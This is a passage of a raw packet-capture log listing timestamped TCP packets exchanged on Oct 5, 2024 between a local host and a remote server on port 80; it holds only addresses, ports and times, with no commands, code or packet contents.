                                                                                                                                      Oct 5, 2024 14:52:57.878720045 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878731966 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878735065 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.878751993 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878773928 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.879071951 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879082918 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879093885 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879122972 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.879152060 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879169941 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879180908 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879193068 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879204988 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879215956 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879215002 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.879252911 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.879252911 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.879436016 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879446983 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879458904 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879482985 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879493952 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879493952 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.879503965 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879523993 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879530907 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.879534006 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879547119 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879559040 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879570007 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879570961 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.879581928 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879633904 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.879633904 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.879690886 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879702091 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879712105 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879723072 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879734993 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879736900 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.879745960 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879760981 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879760981 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.879772902 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.879781008 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.879827976 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.880141020 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.880151987 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.880161047 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.880181074 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.880191088 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.880196095 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.880204916 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.880218029 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.880219936 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.880248070 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.880276918 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.880287886 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.880297899 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.880310059 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.880319118 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.880323887 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.880331039 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.880342960 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.880347013 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.880378962 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.884146929 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.887504101 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.963702917 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.963773012 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.963783026 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.963834047 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.963856936 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.963869095 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.963881016 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.963892937 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.963903904 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.963905096 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.963926077 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.964046001 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964061975 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964073896 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964083910 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964087963 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.964096069 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964107037 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964112043 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.964118958 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964138031 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.964143991 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964184999 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.964205980 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964215994 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964226961 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964246035 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964250088 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.964257002 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964267969 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964281082 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964288950 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.964310884 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.964448929 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964458942 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964468956 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964489937 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.964518070 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964530945 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964540958 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964550972 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964562893 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964562893 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.964579105 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.964688063 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964730978 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.964739084 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964751005 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964797020 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964807987 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964818001 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964824915 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.964829922 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964883089 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964894056 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964898109 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.964898109 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.964941978 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964950085 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.964953899 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964966059 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964977026 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964988947 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.964993954 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.965001106 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965008020 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.965039015 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.965219021 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965280056 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965291023 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965322018 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.965380907 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965390921 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965399981 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965423107 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.965624094 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965635061 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965645075 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965656042 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965667009 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.965667009 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965679884 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965691090 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965692997 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.965703011 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965713978 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.965722084 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965738058 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.965805054 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965820074 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965831995 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965842009 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965847015 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.965854883 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965857029 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.965867996 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965878010 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965889931 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.965893984 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.965925932 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.966181040 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966197014 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966207027 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966217995 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966228008 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.966231108 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966243029 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966252089 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.966254950 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966274977 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.966316938 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966330051 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966341019 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966362953 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.966371059 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966382027 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966392040 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966402054 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966413021 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966413975 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.966428041 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966437101 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.966440916 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966461897 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966471910 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.966806889 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966849089 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.966867924 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966880083 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966892004 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966912031 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966914892 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.966932058 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966943979 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966947079 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.966955900 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966969013 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.966976881 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.967000961 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.967051983 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.967062950 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.967072010 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.967084885 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.967094898 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.967096090 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.967108011 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.967119932 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.967129946 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.967142105 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.967149019 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.967160940 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.967170954 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.967183113 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.967192888 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.967219114 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.967504025 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.967564106 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.967573881 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.967607021 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.967624903 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.050789118 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.050817013 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.050829887 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.050875902 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.050882101 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.050887108 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.050883055 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.050896883 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.050909042 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.050931931 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.050947905 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.051139116 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051150084 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051162958 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051179886 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051191092 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051198006 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.051202059 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051214933 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051223040 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051224947 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.051234961 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051246881 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051249981 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.051270962 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.051655054 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051666975 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051685095 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051695108 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051703930 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.051704884 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051718950 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051728010 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.051728964 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051739931 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051750898 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051759005 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.051763058 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051775932 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051788092 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051788092 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.051800966 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051811934 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.051815987 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051829100 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051837921 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.051840067 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051853895 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051866055 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051872015 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051878929 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.051882982 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.051893950 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.051918030 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.052865028 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.052875996 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.052886009 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.052896976 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.052910089 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.052911043 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.052931070 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.052938938 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.052942038 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.052953005 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.052964926 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.052969933 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.052974939 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.052985907 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.052997112 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.052999973 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:58.053009987 CEST8049163107.172.130.147192.168.2.22
